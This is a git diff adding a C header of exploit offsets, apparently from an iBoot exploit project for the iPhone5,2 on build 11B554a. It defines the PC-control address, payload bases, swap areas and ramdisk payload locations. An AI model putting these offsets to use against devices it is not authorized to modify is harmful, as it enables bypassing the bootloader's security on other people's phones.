diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h b/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h
new file mode 100644
index 0000000..83de810
--- /dev/null
+++ b/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h
@@ -0,0 +1,26 @@
+/*
+ * header.h
+ * Copyright (c) 2021 - 2023 @ kok3shidoll
+ *
+ *
+ */
+
+/* iPhone5,2 - 11B554a [iBoot] */
+#define EXPLOIT_BASE                0x47bb0     // PC register obtained by exploit
+#define EXPLOIT_SECOND_BASE         0x47BFC     // Set second point to bypass overwriting by exploit
+#define EXPLOIT_SWAP_BASE           0x478A0     // Exploit area is small, so set points somewhere else
+
+/* iPhone5,2 - 11B554a [NewiBoot] */
+#define PAYLOAD_BASE                0x43240     // main_task() configured for new iBoot
+#define PAYLOAD_BASE_SIZE           0x44        // sz
+
+/* iPhone5,2 - 11B554a [ramdisk] */
+#define RDSK_PD_BASE                0x85c
+#define RDSK_PD_SECOND_BASE         0x8a8
+#define RDSK_PD_SWAP_BASE           0x570
+
+/* payload setting */
+#define EXPLOIT_BASE_SIZE           0x40
+#define EXPLOIT_SECOND_BASE_SIZE    0x34
+#define EXPLOIT_SWAP_BASE_SIZE      0x12
+